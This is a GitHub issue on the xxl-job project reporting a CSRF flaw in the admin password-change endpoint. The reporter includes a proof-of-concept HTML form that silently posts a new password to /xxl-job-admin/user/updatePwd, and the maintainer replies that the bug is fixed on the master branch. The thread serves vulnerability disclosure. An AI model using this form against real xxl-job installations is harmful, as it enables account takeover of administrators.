### ISSUE TITLE
平台存在CSRF修改密码漏洞

### ISSUE THREAD

**Issue by liukerui** [xuxueli/xxl-job#3250]
平台存在CSRF修改密码漏洞
    脚本如下：

<html>
  

  <body>

  <script>history.pushState('', '', '/')</script>

    <form action="https://xxljob.aaabbbcccddd.com/xxl-job-admin/user/updatePwd" method="POST">

      <input type="hidden" name="password" value="asdfgh123!@#" />

      <input type="submit" value="Submit request" />

    </form>

  </body>

</html>

**Comment by xuxueli** [comment]
问题已修复，代码推送master分支。后续随新版本发布。
